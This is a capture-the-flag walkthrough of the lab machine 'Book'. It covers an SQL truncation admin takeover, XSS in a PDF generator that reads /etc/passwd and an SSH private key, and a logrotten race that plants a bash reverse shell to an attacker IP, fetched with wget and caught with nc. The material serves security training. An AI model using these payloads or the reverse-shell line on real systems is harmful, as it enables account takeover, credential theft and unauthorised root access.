## Recon

### Nmap Scan

Nmap shows few open ports, and a full-port scan gives the same result: only 22 and 80 are open, so the focus is on port 80.
```text
# Nmap 7.80 scan initiated Tue May 19 21:52:32 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.176
Nmap scan report for 10.10.10.176
Host is up (0.28s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
|   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
|_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: LIBRARY - Read | Learn | Have Fun
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 19 21:52:52 2020 -- 1 IP address (1 host up) scanned in 20.07 seconds
```
Visiting the site and reading the page source, we find an unusual function, validateForm, whose alert messages disclose fixed length limits for the username (10 characters) and the email address (20 characters), even though the function itself only checks that the fields are not empty.
```html
<!DOCTYPE html>
...
function validateForm() {
  var x = document.forms["myForm"]["name"].value;
  var y = document.forms["myForm"]["email"].value;
  if (x == "") {
    alert("Please fill name field. Should not be more than 10 characters");
    return false;
  }
  if (y == "") {
    alert("Please fill email field. Should not be more than 20 characters");
    return false;
  }
}
...
```
Directory brute-forcing of the web root turns up an admin backend at /admin, which requires logging in with an existing account.
```text
/download.php (Status: 302)
/index.php (Status: 200)
/search.php (Status: 302)
/contact.php (Status: 302)
/home.php (Status: 302)
/images (Status: 301)
/profile.php (Status: 302)
/docs (Status: 301)
/books.php (Status: 302)
/feedback.php (Status: 302)
/admin (Status: 301)
/db.php (Status: 200)
/logout.php (Status: 302)
/collections.php (Status: 302)
/settings.php (Status: 302)
```
## SQL Truncation

After registering a random user and logging in, we find that the site's administrator account is admin@book.htb. Combining the interesting code found earlier with this article (Link Here), we find that we can force the password of any account this way. The mechanism is SQL truncation: a MySQL server running without STRICT_TRANS_TABLES silently cuts a value that exceeds the column width on INSERT, and its default PAD SPACE collations ignore trailing spaces when comparing strings. An email padded with spaces past the 20-character limit therefore fails to match the existing admin row in the duplicate-account check, but is stored as admin@book.htb followed by spaces, which matches the real address at login. Intercept the registration request with Burp Suite, change it to the form below and send it; the response is a 302.
```text
POST / HTTP/1.1
Host: 10.10.10.176
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.176/
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookie: PHPSESSID=mr0i5e44ek6brbngn06gbefb72
Upgrade-Insecure-Requests: 1

name=admin a&email=admin%40book.htb dc03&password=admin
```
```text
HTTP/1.1 302 Found
Date: Fri, 22 May 2020 01:34:32 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
location: index.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
```
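To make the mechanism concrete, here is an added Python model of the registration logic (not code from the box or from the original writeup) with the vulnerable flow beside a hardened one. It assumes name and email are stored as VARCHAR(10) and VARCHAR(20), the widths hinted by validateForm, on a MySQL server running without STRICT_TRANS_TABLES; the in-memory table and the seeded admin row are constructed for the demo.

```python
NAME_LEN, EMAIL_LEN = 10, 20  # assumed column widths, taken from the validateForm hints


class LegacyUserTable:
    """Emulates name VARCHAR(10) / email VARCHAR(20) on a non-strict MySQL."""

    def __init__(self):
        self.rows = []  # (name, email, password) exactly as stored

    @staticmethod
    def _eq(a, b):
        return a.rstrip(" ") == b.rstrip(" ")  # PAD SPACE: trailing spaces ignored

    def select_by_email(self, email):
        return [r for r in self.rows if self._eq(r[1], email)]

    def insert(self, name, email, password, strict=False):
        if strict and (len(name) > NAME_LEN or len(email) > EMAIL_LEN):
            raise ValueError("Data too long for column")  # STRICT_TRANS_TABLES
        self.rows.append((name[:NAME_LEN], email[:EMAIL_LEN], password))


def register_vulnerable(db, name, email, password):
    """Trusts the browser-side length check. The duplicate lookup runs on the
    full padded value and misses the admin row; the INSERT then stores the
    truncated value, which compares equal to admin@book.htb."""
    if db.select_by_email(email):
        return False
    db.insert(name, email, password)
    return True


def register_fixed(db, name, email, password):
    """Server-side length limits before the lookup, plus a strict INSERT."""
    if len(name) > NAME_LEN or len(email) > EMAIL_LEN:
        return False
    if db.select_by_email(email):
        return False
    db.insert(name, email, password, strict=True)
    return True


def login(db, email, password):
    """WHERE email = ? AND password = ?: any row that matches logs the user in."""
    return any(r[2] == password for r in db.select_by_email(email))


def seeded_table():
    """Constructed starting state: the real admin with a password we do not know."""
    db = LegacyUserTable()
    db.insert("admin", "admin@book.htb", "constructed-original-password")
    return db
```

A UNIQUE index on email would also have stopped the second row: under PAD SPACE the truncated value is a duplicate key of admin@book.htb.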
## User.txt

Log in to the user pages and the admin panel with admin@book.htb and the password admin. Content uploaded at http://book.htb/collections.php can be viewed from http://book.htb/admin/collections.php by downloading the collection as a PDF. Combined with this article, we learn that XSS in the PDF generator can be used to read local files. First, read /etc/passwd to see which users exist.
```html
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
```
Downloading the PDF gives the following result:
```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
reader:x:1000:1000:reader:/home/reader:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
```
The user reader exists, so we try to read the SSH key in that user's home directory:
```html
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///home/reader/.ssh/id_rsa");x.send();</script>
```
Downloading the PDF gives reader's RSA private key.
Log in as reader with the key and read user.txt:
```text
~/Documents/HTB/Book root@kali ❯ ssh reader@10.10.10.176 -i reader_rsa
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 5.4.1-050401-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri May 22 02:10:06 UTC 2020

  System load:  0.36               Processes:            269
  Usage of /:   28.5% of 19.56GB   Users logged in:      1
  Memory usage: 39%                IP address for ens33: 10.10.10.176
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

114 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu May 21 18:26:15 2020 from 10.10.14.59
reader@book:~$ cat user.txt
51c1d4b5197fa30e3e5d37f8778f95bc
reader@book:~$
```
## Privilege Escalation

Running linpeas.sh flags logrotten; the link it gives explains that this can allow privilege escalation.
```text
[+] Writable log files (logrotten)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation
Writable: /home/reader/backups/access.log.1
Writable: /home/reader/backups/access.log.12
Writable: /home/reader/backups/access.log.4
Writable: /home/reader/backups/access.log.11
Writable: /home/reader/backups/access.log.9
Writable: /home/reader/backups/access.log.10
Writable: /home/reader/backups/access.log
Writable: /home/reader/backups/access.log.6
Writable: /home/reader/backups/access.log.2
Writable: /home/reader/backups/access.log.5
Writable: /home/reader/backups/access.log.7
Writable: /home/reader/backups/access.log.8
Writable: /home/reader/backups/access.log.3
```
## root.txt

Download the PoC to the target machine and compile it with gcc:
```text
reader@book:/dev/shm$ wget 10.10.14.105/logrotten.c
--2020-05-22 02:19:58--  http://10.10.14.105/logrotten.c
Connecting to 10.10.14.105:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7342 (7.2K) [text/plain]
Saving to: ‘logrotten.c’

logrotten.c         100%[===================================>]   7.17K  --.-KB/s    in 0.04s

2020-05-22 02:19:59 (186 KB/s) - ‘logrotten.c’ saved [7342/7342]

reader@book:/dev/shm$ ls
linpeas.sh  logrotten.c
reader@book:/dev/shm$ gcc -o logrotten logrotten.c
```
Write the reverse shell into the payload file:
```text
reader@book:/dev/shm$ cat payload
bash -c 'bash -i >& /dev/tcp/10.10.14.105/9001 0>&1'
```
Because this PoC relies on a race condition that appears when logrotate renames the target log, the log has to receive a large amount of data so that logrotate rotates it. Here we use dd to generate a 10 MB junk file, ready to be written into the log file:
```shell
dd if=/dev/zero of=zeroFile bs=1M count=10
```
Then run the exploit, write the junk file into the log, and catch the reverse shell. Once the rotation fires, logrotten has swapped /home/reader/backups for a symlink to /etc/bash_completion.d, so the rotated file carrying the payload is created there; root's interactive bash sources that directory on login, which is what runs the payload.
Step 1

```text
reader@book:/dev/shm$ ./logrotten -p ./payload /home/reader/backups/access.log
Waiting for rotating /home/reader/backups/access.log...
Renamed /home/reader/backups with /home/reader/backups2 and created symlink to /etc/bash_completion.d
Waiting 1 seconds before writing payload...
Done!
reader@book:/dev/shm$ cd V
-bash: cd: V: No such file or directory
reader@book:/dev/shm$ cd /etc/bash_completion.d
reader@book:/etc/bash_completion.d$ ls
access.log  access.log.1  apport_completion  cloud-init  git-prompt  grub
reader@book:/etc/bash_completion.d$ cat access.log
reader@book:/etc/bash_completion.d$ cat access.log.1
bash -c 'bash -i >& /dev/tcp/10.10.14.105/9001 0>&1'
reader@book:/etc/bash_completion.d$
```
Step 2

```text
reader@book:/dev/shm$ cat zeroFile > /home/reader/backups/access.log
```
Step 3

```text
~/Documents/HTB/Book root@kali 12s ❯ nc -nlvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.176.
Ncat: Connection from 10.10.10.176:43408.
root@book:~ cat root.txt
84da92adf998a1c7231297f70dd89714
root@book:~
```